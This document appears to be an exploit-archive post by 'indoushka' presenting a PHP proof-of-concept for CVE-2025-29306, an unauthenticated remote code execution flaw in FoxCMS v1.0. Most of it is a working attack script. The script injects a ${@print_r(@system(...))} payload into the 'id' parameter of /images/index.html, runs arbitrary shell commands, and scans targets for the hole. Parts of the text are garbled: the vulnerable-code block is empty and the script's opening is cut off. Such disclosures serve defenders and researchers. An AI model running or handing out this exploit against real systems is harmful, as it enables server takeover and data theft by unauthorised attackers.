============================================================================================================================================= | # Title : FoxCMS v1.0 php code innjection | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://sourceforge.net/projects/fox-cms/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/190551/ & CVE-2025-29306 [+] Summary A critical remote code execution vulnerability exists in FoxCMS v1.0 that allows unauthenticated attackers to execute arbitrary operating system commands via the 'id' parameter in the /images/index.html endpoint. The vulnerability stems from improper input sanitization and direct code evaluation. The vulnerability exists in the FoxCMS v1.0 /images/index.html endpoint where user-supplied input in the 'id' parameter is directly evaluated without proper sanitization. The system fails to validate and sanitize user input, allowing attackers to inject and execute arbitrary PHP code. [+] Vulnerable Code Pattern: ```php // In /images/index.html or related component [+] Usage: Usage: php exploit.php https://victim.com "id" [+] POC : colors = [ 'RED' => "\033[91m", 'GREEN' => "\033[92m", 'YELLOW' => "\033[93m", 'BLUE' => "\033[94m", 'MAGENTA' => "\033[95m", 'CYAN' => "\033[96m", 'WHITE' => "\033[97m", 'BOLD' => "\033[1m", 'RESET' => "\033[0m" ]; } private function color($text, $color) { return $this->colors[$color] . $text . $this->colors['RESET']; } private function showBanner() { $banner = $this->color(" ", 'CYAN') . $this->color(" ", 'MAGENTA') . $this->color("\n CVE-2025-29306 - FoxCMS v1.0 RCE Exploit\n", 'RED') . $this->color(" @indoushka\n\n", 'WHITE'); echo $banner; } private function makeRequest($url) { $context = stream_context_create([ 'http' => [ 'timeout' => 10, 'ignore_errors' => true, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $response = @file_get_contents($url, false, $context); if ($response === false) { return ['success' => false, 'error' => 'Request failed']; } return ['success' => true, 'content' => $response]; } private function extractCommandOutput($html) { // Try multiple extraction methods $output = ''; // Method 1: Simple tag stripping $cleaned = strip_tags($html); // Method 2: Look for command output patterns if (preg_match('/]*>(.*?)<\/ul>/si', $html, $matches)) { $output = strip_tags($matches[1]); } // Method 3: Extract between common output markers if (preg_match('/\b(root|bin|daemon|system)\b/i', $cleaned)) { $output = $cleaned; } // Clean up the output $output = preg_replace('/\s+/', ' ', $output); $output = trim($output); return $output ?: $cleaned; } public function execute($target, $command) { $this->showBanner(); echo $this->color("[*] Target: ", 'BLUE') . $target . "\n"; echo $this->color("[*] Command: ", 'BLUE') . $command . "\n\n"; // Construct the exploit URL $payload = '${@print_r(@system("' . $command . '"))}'; $encodedPayload = urlencode($payload); $exploitUrl = rtrim($target, '/') . '/images/index.html?id=' . $encodedPayload; echo $this->color("[*] Sending RCE payload...", 'YELLOW') . "\n"; echo $this->color("[*] Exploit URL: ", 'CYAN') . $exploitUrl . "\n\n"; $response = $this->makeRequest($exploitUrl); if (!$response['success']) { echo $this->color("[!] Request failed: " . $response['error'], 'RED') . "\n"; return; } $output = $this->extractCommandOutput($response['content']); if (empty(trim($output))) { echo $this->color("[!] No command output received", 'RED') . "\n"; echo $this->color("[*] Response preview:", 'YELLOW') . "\n"; echo substr($response['content'], 0, 500) . "\n\n"; } else { echo $this->color("[+] Command output:", 'GREEN') . "\n"; echo $this->color(str_repeat("=", 60), 'CYAN') . "\n"; echo $output . "\n"; echo $this->color(str_repeat("=", 60), 'CYAN') . "\n"; } // Test additional commands for verification $this->testAdditionalCommands($target); } private function testAdditionalCommands($target) { echo $this->color("\n[*] Testing additional verification commands...", 'YELLOW') . "\n"; $testCommands = [ 'whoami' => 'Current user', 'pwd' => 'Current directory', 'uname -a' => 'System information' ]; foreach ($testCommands as $cmd => $description) { $payload = '${@print_r(@system("' . $cmd . '"))}'; $encodedPayload = urlencode($payload); $testUrl = rtrim($target, '/') . '/images/index.html?id=' . $encodedPayload; $response = $this->makeRequest($testUrl); if ($response['success']) { $output = $this->extractCommandOutput($response['content']); if (!empty(trim($output))) { echo $this->color("[+] $description: ", 'GREEN') . trim($output) . "\n"; } } } } public function scan($target) { $this->showBanner(); echo $this->color("[*] Scanning target for FoxCMS vulnerability: ", 'BLUE') . $target . "\n\n"; $testUrl = rtrim($target, '/') . '/images/index.html'; // First check if endpoint exists echo $this->color("[*] Checking if /images/index.html exists...", 'YELLOW') . "\n"; $response = $this->makeRequest($testUrl); if (!$response['success']) { echo $this->color("[-] Endpoint not accessible", 'RED') . "\n"; return false; } echo $this->color("[+] Endpoint is accessible", 'GREEN') . "\n"; // Test with simple command $testCommand = 'echo "VULNERABLE"'; $payload = '${@print_r(@system("' . $testCommand . '"))}'; $encodedPayload = urlencode($payload); $exploitUrl = $testUrl . '?id=' . $encodedPayload; echo $this->color("[*] Testing for RCE vulnerability...", 'YELLOW') . "\n"; $response = $this->makeRequest($exploitUrl); if ($response['success'] && strpos($response['content'], 'VULNERABLE') !== false) { echo $this->color("[+] Target is VULNERABLE to CVE-2025-29306!", 'RED') . "\n"; return true; } else { echo $this->color("[-] Target does not appear to be vulnerable", 'GREEN') . "\n"; return false; } } } // Main execution if (php_sapi_name() === 'cli') { if ($argc < 2) { echo "CVE-2025-29306 - FoxCMS v1.0 RCE Exploit\n"; echo "Usage:\n"; echo " php exploit.php [command]\n"; echo " php exploit.php --scan\n"; echo "\nExamples:\n"; echo " php exploit.php https://victim.com \"id\"\n"; echo " php exploit.php https://victim.com \"ls -la\"\n"; echo " php exploit.php https://victim.com --scan\n"; echo "\nDescription:\n"; echo " Exploits RCE vulnerability in FoxCMS v1.0 via /images/index.html id parameter\n"; exit(1); } $target = $argv[1]; $command = $argv[2] ?? '--scan'; if (!filter_var($target, FILTER_VALIDATE_URL)) { echo "Error: Invalid target URL\n"; exit(1); } $exploit = new FoxCMSExploit(); if ($command === '--scan') { $exploit->scan($target); } else { $exploit->execute($target, $command); } } else { echo "This script is intended for command line use only.\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================